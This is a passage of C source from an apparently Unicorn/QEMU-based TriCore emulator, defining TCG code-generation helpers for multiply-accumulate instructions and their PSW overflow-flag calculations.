tcg_gen_mov_tl(tcg_ctx, ret_high, t4); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t4); } static inline void gen_maddu64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, r1); tcg_gen_concat_i32_i64(tcg_ctx, t2, r2_low, r2_high); tcg_gen_extu_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_add_i64(tcg_ctx, t2, t2, t1); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, t2); /* only the add overflows, if t2 < t1 calc V bit */ tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, t2, t2, t1); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_maddi64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_madd64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddui64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_maddu64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madd_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_add_tl, tcg_gen_add_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsu_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_sub_tl, tcg_gen_add_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsum_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_3, r1_low, r1_high); tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); gen_add64_d(ctx, temp64_2, temp64_3, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_adds(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2); static inline void gen_madds_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_adds(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_adds(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_subs(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2); static inline void gen_maddsus_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_subs(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_adds(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddsums_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_sari_i64(tcg_ctx, temp64_2, temp64, 32); /* high */ tcg_gen_ext32s_i64(tcg_ctx, temp64, temp64); /* low */ tcg_gen_sub_i64(tcg_ctx, temp64, temp64_2, temp64); tcg_gen_shli_i64(tcg_ctx, temp64, temp64, 16); tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_add64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_maddm_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_add64_d(ctx, temp64_3, temp64_2, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_maddms_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_add64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_maddr64_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_addr_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_maddr64_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_maddsur32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_addsur_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr64s_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_addr_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_maddr64s_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_maddsur32s_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_helper_addsur_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, temp, temp2); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_maddr_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_maddr_q(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_maddrs_q(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); gen_helper_maddr_q_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, r1, r2, r3, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_madd32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_shli_i64(tcg_ctx, t2, t2, n); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); tcg_gen_sari_i64(tcg_ctx, t2, t2, up_shift); tcg_gen_add_i64(tcg_ctx, t3, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, temp3, t3); /* calc v bit */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t1, t3, 0x7fffffffLL); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t3, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* We produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we negate the ovf. */ if (n == 1) { tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, arg2, 0x80000000); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, temp2, arg2, arg3); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_shli_tl(tcg_ctx, temp, temp, 31); /* negate v bit, if special condition */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); } /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, temp3); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp3, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_m16add32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_add_d(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16adds32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } gen_adds(ctx, ret, arg1, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16add64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_add64_d(ctx, t3, t1, t2); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t3); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_m16adds64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); if (n == 0) { tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); } else { /* n is expected to be 1 */ tcg_gen_mul_tl(tcg_ctx, temp, arg2, arg3); tcg_gen_shli_tl(tcg_ctx, temp, temp, 1); /* catch special case r1 = r2 = 0x8000 */ tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp2, temp, 0x80000000); tcg_gen_sub_tl(tcg_ctx, temp, temp, temp2); } tcg_gen_ext_i32_i64(tcg_ctx, t2, temp); tcg_gen_shli_i64(tcg_ctx, t2, t2, 16); tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); gen_helper_add64_ssov(tcg_ctx, t1, tcg_ctx->cpu_env, t1, t2); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t1); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } static inline void gen_madd64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t4 = tcg_temp_new_i64(tcg_ctx); TCGv temp, temp2; tcg_gen_concat_i32_i64(tcg_ctx, t1, arg1_low, arg1_high); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); if (n != 0) { tcg_gen_shli_i64(tcg_ctx, t2, t2, 1); } tcg_gen_add_i64(tcg_ctx, t4, t1, t2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t3, t4, t1); tcg_gen_xor_i64(tcg_ctx, t2, t1, t2); tcg_gen_andc_i64(tcg_ctx, t3, t3, t2); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t3); /* We produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we negate the ovf. */ if (n == 1) { temp = tcg_temp_new(tcg_ctx); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, temp, arg2, 0x80000000); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, temp2, arg2, arg3); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_shli_tl(tcg_ctx, temp, temp, 31); /* negate v bit, if special condition */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, t4); /* Calc SV bit */ 